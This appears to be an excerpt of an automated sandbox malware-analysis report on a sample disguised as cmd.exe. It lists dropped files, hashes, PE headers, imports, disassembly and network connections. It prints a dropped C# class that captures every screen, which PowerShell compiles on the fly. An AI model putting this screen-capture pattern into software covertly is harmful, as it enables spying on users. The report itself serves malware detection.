                                                                                                                                                                                                                                    SHA-512:5A71BDD2D8BA84F0C8CD5C01AC6EBB305A30544DDCFC6FA5FF710377F220A58A2D17205C31DCA6348490945D308C4098A61C7E60729D7022D8F5000B0212BD46
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.c.d.u.5.f.i.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.c.d.u.5.f.i.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.0.cs

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1004
                                                                                                                                                                                                                                    Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                    MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                    SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                    SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                    SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                                                                                    Entropy (8bit):5.323271795325248
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfM2qWZEifM2dxn:V3ka6KOkqeFkOffEifJx
                                                                                                                                                                                                                                    MD5:2280EE757C74153BC79BEC1678B4D4FE
                                                                                                                                                                                                                                    SHA1:ED8631FD218B66FECFEEE936CB9AA49FF3F353CE
                                                                                                                                                                                                                                    SHA-256:C4C66724391147784DBB6EE4690F7DF0B1A04718D0953BD59E29810CA27F97DF
                                                                                                                                                                                                                                    SHA-512:3D9477802D0866F8495E5B55C59FA722055B872787313D229AEB4F13C1FE2AE08AB5CF55A030AEBCB07274703EEF5E2E4A9C800246364FD5113FA3A451781983
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.0.cs"

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dll

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                                                                                    Entropy (8bit):3.155698291019072
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:657oEAtf0KhzBU/pf6mtJ7mN0CDpW1ulc+a3f9q:HNz04mjmO6K+Kf
                                                                                                                                                                                                                                    MD5:9F056B4E6B2FFE4BF190CC59DE0A1D81
                                                                                                                                                                                                                                    SHA1:C5F4DB30964C4EF48B3C589C10896D1E7028F291
                                                                                                                                                                                                                                    SHA-256:14ED91645AAC7B2C8A7030C97277A6045693A6A18693403C265E1DFC163322D2
                                                                                                                                                                                                                                    SHA-512:5A771F627B7C714EF5A50351A1E348BE70A62DFEFCC9205E4BA648D3833B0EBB803F10B541E5D4B19196D0C646A54BE47D813D343AF75A644E1E2E3199562203
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I=Bg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.out

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):1148
                                                                                                                                                                                                                                    Entropy (8bit):5.4963940007946865
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:KJfIId3ka6KOkqeFkOffEifJUKax5DqBVKVrdFAMBJTH:uIkka6NkqeFkyfEuJUK2DcVKdBJj
                                                                                                                                                                                                                                    MD5:4DC05C530E556E36978FE5CF3E6B4DF2
                                                                                                                                                                                                                                    SHA1:DCC095A91D74A473F3FCBAFD5D5869EB2AB377FF
                                                                                                                                                                                                                                    SHA-256:DE9233F53BCC6E2D806FDE0FF00E99F4FB5793736CFB2DD2A4065AC458D16884
                                                                                                                                                                                                                                    SHA-512:9CDCAB3F42090BD863D86741E2F5A60B30DFB5AC9AFF8A26D2045D07705E8CF1E06D9B455D2751F2FD94EA9D5A80FBEEED7BBCF494F368C5110FDB6C19FD4925
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer

                                                                                                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                    Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                    MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                    SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                    SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                    SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):7.989769456024753
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:cmd.exe
                                                                                                                                                                                                                                    File size:6'263'156 bytes
                                                                                                                                                                                                                                    MD5:b2fe874c2e11c56edf05c5250a8c966f
                                                                                                                                                                                                                                    SHA1:06d6e28c3cb46e06195a5f8c360d8eeaddfb1c06
                                                                                                                                                                                                                                    SHA256:255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f
                                                                                                                                                                                                                                    SHA512:915ec47beaf9a572c135fe0ddcccf2bb18b6620dcaf9fc8069436e4fe8d3dce15424c3043b45668c7c4f81e513bb731d7bd310eacea6ea1e01cb019b1cc71b90
                                                                                                                                                                                                                                    SSDEEP:98304:skEtdFBCm/I5NamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RxOnAKuP/ty/:szFIm/PeN/FJMIDJf0gsAGK4R0nAKuXq
                                                                                                                                                                                                                                    TLSH:7E563370279409E1FDBA463EC866C84AC1B0FC050764DE8B136492BA2F33B555E7FB96
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Entrypoint:0x14000ce20
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x67415729 [Sat Nov 23 04:16:41 2024 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                    • 28/09/2021 20:00:00 28/09/2024 19:59:59
                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                    • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                    Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                    Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                    Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                    Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                    call 00007F12DCFA001Ch
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                    jmp 00007F12DCF9FC3Fh
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                    call 00007F12DCFA03E8h
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007F12DCF9FDE3h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDC7h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                                                    je 00007F12DCF9FDD6h
                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                    jne 00007F12DCF9FDB0h
                                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDB9h
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                    test ecx, ecx
                                                                                                                                                                                                                                    jne 00007F12DCF9FDC9h
                                                                                                                                                                                                                                    mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                    call 00007F12DCF9F515h
                                                                                                                                                                                                                                    call 00007F12DCFA0800h
                                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                                    jne 00007F12DCF9FDC6h
                                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDD6h
                                                                                                                                                                                                                                    call 00007F12DCFAD31Fh
                                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                                    jne 00007F12DCF9FDCBh
                                                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                                                    call 00007F12DCFA0810h
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDACh
                                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                                                                                    cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                    mov ebx, ecx
                                                                                                                                                                                                                                    jne 00007F12DCF9FE29h
                                                                                                                                                                                                                                    cmp ecx, 01h
                                                                                                                                                                                                                                    jnbe 00007F12DCF9FE2Ch
                                                                                                                                                                                                                                    call 00007F12DCFA035Eh
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007F12DCF9FDEAh
                                                                                                                                                                                                                                    test ebx, ebx
                                                                                                                                                                                                                                    jne 00007F12DCF9FDE6h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                    call 00007F12DCFAD112h

                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x968.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x5f6d2c0x2448
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x2b0000x12a280x12c008e90e31fefe08b1c816d6044594d54d8False0.5243229166666666data5.750770296559466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rsrc0x470000x9680xa006a105e1c14897b38a163ad6994872bbeFalse0.422265625data5.075410316669733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_VERSION0x470a00x3b8COM executable for DOS0.43067226890756305
                                                                                                                                                                                                                                    RT_MANIFEST0x474580x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                    COMCTL32.dll
                                                                                                                                                                                                                                    KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.248313904 CET4974780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.374723911 CET8049747208.95.112.1192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.374860048 CET4974780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.374985933 CET4974780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.500655890 CET8049747208.95.112.1192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:33.540514946 CET8049747208.95.112.1192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:33.580631018 CET4974780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.009670019 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.009735107 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.009798050 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.039592028 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.039623022 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.301168919 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.301763058 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.301785946 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.303225994 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.303426981 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.304593086 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.304678917 CET44349748162.159.128.233192.168.2.4
